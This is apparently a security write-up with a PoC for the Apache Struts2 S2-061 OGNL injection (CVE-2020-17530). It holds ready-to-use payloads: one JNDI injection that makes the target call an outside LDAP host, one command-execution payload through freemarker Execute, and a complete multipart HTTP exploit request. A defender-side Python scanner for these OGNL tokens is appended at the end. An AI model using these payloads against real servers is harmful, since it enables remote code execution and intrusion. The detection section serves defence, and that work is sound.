# Struts2 s2-061 Poc (CVE-2020-17530)

This hole is not that serious; it is really just a bypass of s2-059, so don't read too much into it.

Thinking laterally: this BeanMap gadget is similar to the command execution in fastjson, so a JNDI injection can be constructed the same way. com.sun.rowset.JdbcRowSetImpl also has a no-argument constructor, and its DataSourceName can likewise be set through the BeanMap.

```
public void setDataSourceName(String var1) throws SQLException {
    if (this.getDataSourceName() != null) {
        if (!this.getDataSourceName().equals(var1)) {
            super.setDataSourceName(var1);
            this.conn = null;
            this.ps = null;
            this.rs = null;
        }
    } else {
        super.setDataSourceName(var1);
    }

}
```

Finally, getAutoCommit triggers the JNDI injection.

```
public boolean getAutoCommit() throws SQLException {
    return this.conn.getAutoCommit();
}
```

JNDI payload

```
%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#rw=#UnicodeSec.newInstance('com.sun.rowset.JdbcRowSetImpl')).(#rw.setDataSourceName('ldap://192.168.3.254:10086/UnicodeSec')).(#rw.getDatabaseMetaData())}
```

Command execution payload

```
%{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'whoami'}).(#res=#exec.exec(#cmd))}
```

via:

https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

For analysis, see:

* https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247485085&idx=1&sn=f264cf31bb82ae957fb985b754890d41&chksm=f9ee6a22ce99e3349b94ef75f77e3c8dadf4ebf47a74921a547429d5180deba122f9593beefc&scene=132#wechat_redirect
* https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

VULHUB Struts2 S2-061:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

PoC:

```
POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 848

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("echo 'forum.ywhack.com'")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
```
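
As an added defender-side example (not part of the original post or the referenced PoC), the following Python scans request parameter values for the OGNL building blocks that the payloads above rely on, after URL-decoding and folding curly quotes so encoded or copy-pasted variants are not missed. The sample values and the `LDAP_HOST` placeholder are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Curly quotes that copy/paste or clients may substitute for ASCII quotes; fold them so
# token matching still works on #application[‘...’] style variants.
_QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})

# Building blocks of the S2-061 payloads shown above. One alone is a weak signal;
# two or more inside a single %{...} / ${...} expression is what we alert on.
SUSPICIOUS_TOKENS = (
    "#application", "#attr", "InstanceManager", "newInstance",
    "org.apache.commons.collections.BeanMap", "memberAccess",
    "excludedClasses", "excludedPackageNames",
    "freemarker.template.utility.Execute",
    "com.sun.rowset.JdbcRowSetImpl", "setDataSourceName",
)

_OGNL = re.compile(r"[%$]\{(.*)\}", re.DOTALL)

def normalize(value: str) -> str:
    """URL-decode twice (catches double encoding), fold quotes, strip whitespace."""
    return re.sub(r"\s+", "", unquote(unquote(value)).translate(_QUOTES))

def inspect_value(value: str) -> dict:
    """Classify one request parameter / multipart field value."""
    v = normalize(value)
    m = _OGNL.search(v)
    if not m:
        return {"ognl": False, "tokens": [], "alert": False}
    hits = [t for t in SUSPICIOUS_TOKENS if t in m.group(1)]
    return {"ognl": True, "tokens": hits, "alert": len(hits) >= 2}

# Constructed samples (not captured traffic): two benign values, a trimmed form of the
# command-execution shape, and a URL-encoded JNDI shape with curly quotes and a placeholder host.
SAMPLES = {
    "plain_id": "42",
    "harmless_expr": "${product.price}",
    "exec_form": '%{(#im=#application["org.apache.tomcat.InstanceManager"])'
                 '.(#bean=#im.newInstance("org.apache.commons.collections.BeanMap"))'
                 '.(#bean.put("excludedClasses",#e))}',
    "jndi_encoded": "%25%7B(%23im%3D%23application%5B%E2%80%98org.apache.tomcat.InstanceManager"
                    "%E2%80%99%5D).(%23rw%3D%23im.newInstance(%E2%80%98com.sun.rowset.JdbcRowSetImpl"
                    "%E2%80%99)).(%23rw.setDataSourceName(%E2%80%98ldap%3A//LDAP_HOST/x%E2%80%99))%7D",
}

def scan(samples: dict) -> dict:
    """Return {name: alert} for every sample value."""
    return {name: inspect_value(v)["alert"] for name, v in samples.items()}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:14s} alert={verdict}")
```

The harmless `${product.price}` value shows why the check counts tokens inside the expression rather than alerting on every `%{` or `${`.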

![](/static/lingjiao/media/16096803266898/16096804259304.jpg)

![](/static/lingjiao/media/16096803266898/16096804320786.jpg)

ref:

https://forum.ywhack.com/thread-114788-1-2.html
